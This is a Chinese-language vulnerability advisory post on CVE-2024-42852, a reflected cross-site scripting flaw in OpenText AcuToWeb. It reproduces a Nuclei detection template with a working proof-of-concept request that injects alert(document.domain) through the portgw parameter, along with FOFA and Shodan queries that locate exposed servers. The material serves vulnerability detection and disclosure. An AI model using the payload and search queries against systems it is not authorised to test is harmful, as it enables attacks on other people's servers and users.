AcuToWeb 跨站脚本漏洞

漏洞信息

漏洞名称: AcuToWeb 跨站脚本漏洞

漏洞编号:

  • CVE: CVE-2024-42852

漏洞类型: 跨站可执行脚本

漏洞等级: 中危

漏洞描述: AcuToWeb是由OpenText开发的一款网络服务软件,广泛用于企业环境中,提供网络服务和应用程序支持。该软件在10.5.0.7577c8b版本中存在一个反射型跨站脚本(XSS)漏洞,具体存在于portgw参数中。由于未对用户输入进行适当的清理和验证,攻击者可以构造恶意的JavaScript代码,通过portgw参数注入到网页中,当其他用户访问该页面时,恶意代码将在用户的浏览器中执行。这种漏洞的利用可以导致会话劫持、凭证窃取或其他恶意活动。由于该漏洞需要通过用户交互(如点击链接)来触发,因此被评定为中危漏洞。为了防范此类攻击,建议用户更新AcuToWeb至最新版本,并对所有用户输入实施严格的验证和输出编码措施。

产品厂商: opentext

产品名称: AcuToWeb

影响版本: 10.5.0.7577c8b

搜索语法: title=”AcuToWeb”

来源: https://github.com/projectdiscovery/nuclei-templates/blob/a6bec281ed581aecb558f1839b0bce9bef8b994e/http%2Fcves%2F2024%2FCVE-2024-42852.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54

id: CVE-2024-42852

info:
name: AcuToWeb server/10.5.0.7577c8b - Cross-Site Scripting
author: ritikchaddha
severity: medium
description: |
AcuToWeb server/10.5.0.7577c8b is vulnerable to reflected cross-site scripting (XSS) via the portgw parameter. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution.
impact: |
Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities.
remediation: |
Update AcuToWeb to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the portgw parameter.
reference:
- https://github.com/Hebing123/cve/issues/64
- https://nvd.nist.gov/vuln/detail/CVE-2024-42852
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2024-42852
cwe-id: CWE-79
cpe: cpe:2.3:a:opentext:acutoweb:10.5.0.7577c8b:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: opentext
product: acutoweb
fofa-query: title="AcuToWeb"
shodan-query: title:"AcuToWeb"
tags: cve,cve2024,xss,acutoweb,opentext

http:
- method: GET
path:
- "{{BaseURL}}/?portgw=80089948;%20alert(document.domain)"

matchers-condition: and
matchers:
- type: word
part: body
words:
- "80089948; alert(document.domain);"
- "WT_GW_PORT"
condition: and

- type: word
part: content_type
words:
- 'text/html'

- type: status
status:
- 200


AcuToWeb 跨站脚本漏洞
http://example.com/2025/07/17/github_2245448148/
作者
lianccc
发布于
2025年7月17日
许可协议